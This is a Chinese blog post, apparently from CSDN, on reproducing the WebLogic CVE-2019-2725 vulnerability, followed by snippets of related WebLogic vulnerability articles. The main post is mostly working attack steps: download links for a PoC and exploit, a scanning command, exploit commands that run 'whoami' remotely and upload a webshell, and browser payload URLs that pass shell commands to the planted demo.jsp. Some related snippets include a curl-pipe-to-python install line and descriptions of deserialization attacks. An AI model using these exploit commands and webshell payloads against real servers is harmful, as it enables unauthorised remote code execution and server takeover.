weblogic漏洞系列

最新推荐文章于 2024-08-10 08:38:11 发布
最新推荐文章于 2024-08-10 08:38:11 发布
阅读量710 收藏
点赞数
分类专栏: Web安全 文章标签: weblogic 安全 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45180264/article/details/106167982
版权

漏洞验证

POC下载:https://github.com/TopScrew/CVE-2019-2725
路径kali:/POCandEXP
进入脚本目录:cd /POCandEXP/weblogic/POC
命令:python3 WeblogicScan.py 1.1.1.14 7001

CVE-2019-2725

EXP下载:https://github.com/TopScrew/CVE-2019-2725
安装所需环境:sudo pip3 install logzero

命令回显

命令:python3 weblogic-2019-2725.py 10.3.6 http://1.1.1.14:7001 whoami

webshel​​l上传

命令:python3 weblogic-2019-2725.py 10.3.6 http://1.1.1.14:7001
浏览器输入payload:http://1.1.1.14:7001/bea_wls_internal/demo.jsp?pwd=admin&cmd=ifconfig
windows服务器payload:http://1.1.1.14:7001/bea_wls_internal/demo.jsp?pwd=admin&cmd=ipconfig
古月哥欠米分
关注
专栏目录
关于WebLogic环境搭建和漏洞复现
qq_43511592的博客
09-24 781
一、环境搭建 使用kali系统安装docker,再在docker上安装环境,这里以CVE-2020-14882为例 在kali进入root用户,输入 git clone https://github.com/vulhub/vulhub.git cd ./vulhub/weblogic/CVE-2020-14882 //此命令需要python3环境,详见 ​curl -s https://bootstrap.pypa.io/get-pip.py | python3 //此命令需要安装docker
weblogic漏洞分析之CVE-2017-10271
洋洋的小黑屋
08-17 1577
weblogic漏洞分析之CVE-2017-10271 一、环境搭建 1)配置docker 这里使用vulhub的环境:CVE-2017-10271 编辑docker-compose.yml文件,加入8453端口 version: '2' services: weblogic: image: vulhub/weblogic:10.3.6.0-2017 ports: - "7001:7001" - "8453:8453" 启动docker docker-compose
weblogic漏洞检测集合工具
11-17
weblogic漏洞检测集合工具支持一键检测多个weblogic漏洞weblogic漏洞检测集合工具支持一键检测多个weblogic漏洞
WebLogic常见的几种漏洞
最新发布
a96482的博客
08-10 1332
漏洞存在于wls9-async组件,该组件为异步通讯服务,攻击者可以在/_async/AsyncResponseService路径下传入恶意的xml格式的数据,传入的数据在服务器端反序列化时,执行其中的恶意代码,实现远程命令执行,攻击者可以进而获得整台服务器的权限。这里我们需要访问一个任意上传jsp文件漏洞功能点的目录位置,扫描目录的时候没有扫出来,但是你上网搜素这个CVE-2018-2894都是可以找到这个目录名字的,/ws_utc/config.do(未授权访问。
weblogic 系列漏洞
SHELLCODE_8BIT的博客
11-15 485
在 RMI 中可以通过调用远程服务器上的方法,对客户端传入的数据进行反序列化,当 T3 协议中的数据被替换成恶意类的序列化数据,则将导致服务器反序列化和实例化一个恶意的类,调用恶意方法,造成 RCE。在官方的补丁修复中,将 CVE-2020-2555 漏洞利用链中的 com.tangosol.util.filter.LimitFilter.toString() 给移除了,使得后面依靠 ChainedExtractor.extract()完成的攻击无法进行。此漏洞为CVE-2017-3248漏洞补丁的绕过。
Weblogic 常见漏洞汇总
热门推荐
box
04-20 1万+
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 WebLogic XMLDecoder反序列化漏洞(CVE-2017-3506) 0x00 漏洞描述 网上爆出weblogic的WLS组件存在xmldecoder
Weblogic常见漏洞详解
m0_64481831的博客
03-01 3658
Weblogic 是一个基于JavaEE架构的中间件,是用于开发、集成、部署和管理大型分布式为Web应用、网络应用和数据库应用的Java应用服务器。Weblogic由纯Java开发,被广泛应用于开发、部署和运行Java应用等适用于本地环境和云环境的企业应用。所以,Weblogic在面试当中被提到频率还蛮高的。这篇文章以vulhub靶场为辅。Weblogic中间件常见漏洞文章讲了任意文件读取和弱口令登录、未授权访问后台和HTTP请求远程代码执行、SSRF利用、XMLDecoder反序列化漏洞
Weblogic相关漏洞
谢公子的博客
01-14 4903
目录 Weblogic Weblogic出现过的漏洞 SSRF(CVE-2014-4210) 任意文件上传(CVE-2018-2894) JAVA反序列化 CVE-2015-4852 CVE-2016-0638 CVE-2016-3510 CVE-2017-3248 Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2...
CVE-2017-10271 Weblogic反序列化漏洞补丁(FMJJ)
01-09
通常,累积补丁包含了多个单独的安全补丁,旨在解决一系列相关或不相关的漏洞,以简化用户的更新流程。在这个案例中,FMJJ补丁可能包含了针对CVE-2017-10271以及其他潜在安全问题的修复代码。 提供的压缩包文件中,...
内网渗透-weblogic中间件系列漏洞
爱上卿的博客
01-25 2214
weblogic WebLogic是美国Oracle公司出品的一个Application Server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。   (1)WebLogic...
weblogic漏洞复现vulhub
08-21
要复现weblogic漏洞,可以使用vulhub靶场中的weblogic服务。vulhub中提供了一些weblogic版本,包括weblogic 10.3.6.0、weblogic 12.1.3.0、weblogic 12.2.1.2和weblogic 12.2.1.3。你可以选择其中一个版本来启动...
Weblogic GetShll&CMD;漏洞检测利用工具.rar
08-20
渗透测试中使用,可以用于检测weblogic漏洞并执行CMD命令,获取服务器权限,本程序仅供检测和学习用途,请勿用于其他任何非法用途!
最新2018年7月WebLogic漏洞(CVE-2018-2893) 适用于weblogic12.2.1.3
07-23
Oracle的高危远程代码执行漏洞(CVE-2018-2893),通过该漏洞攻击者可以在未授权的情况下远程执行任意代码。 受此漏洞影响的版本包括: WebLogic 10.3.6.0 WebLogic 12.1.3.0 WebLogic 12.2.1.2 WebLogic 12.2.1.3 解决方案: 1.控制T3协议的访问 2.升级到 jdk-8u20以上的版本 3.升级补丁
weblogicScan+cve-2017-10271.rar
06-27
WeblogicScan用来监测weblogic漏洞,支持xmldecode类型和java反序列化类型 WeblogicXmlDecode反序列化利用工具,支持cve-2017-10271
linux下安装weblogic1034详细说明文档
12-05
linux下安装weblogic1034详细说明文档
Weblogic 2021年1月漏洞补丁 10.3.6.210119
04-19
在2021年1月,Oracle发布了针对WebLogic Server的版本10.3.6的重要安全补丁,编号为10.3.6.210119,以修复一系列安全漏洞。这些漏洞可能被恶意攻击者利用,对运行WebLogic系统造成严重威胁,包括数据泄露、系统...
weblogic中间件漏洞汇总
混子
11-24 9188
目录一、weblogic是什么?二、安装环境1、下载weblogic2、安装(其实就是点点点啦)三、反序列化漏洞1、XMLDecoder(CVE-2017-102712、XMLDecoder (CVE-2017-35063、wls-wsat远程代码执行(CVE-2019-27254、T3协议命令执行(CVE-2018-26285、 IIOP(CVE-2020-2551四、SSRF1、SSRF(CVE-2014-42102. SSRF联动Redis3、防御五、未授权访问1、Console HTTP协议远程代码
[WEB安全]Weblogic漏洞总结
baguangman5501的博客
09-12 1289
0x01 Weblogic简介 1.1 叙述 Weblogic是美国Oracle公司出品的一个应用服务器(application server),确切的说是一个基于Java EE架构的中间件,是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。 Weblogic将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发...
Weblogic漏洞利用总结
YouthBelief的博客
10-28 6577
weblogic前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy as np imp
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值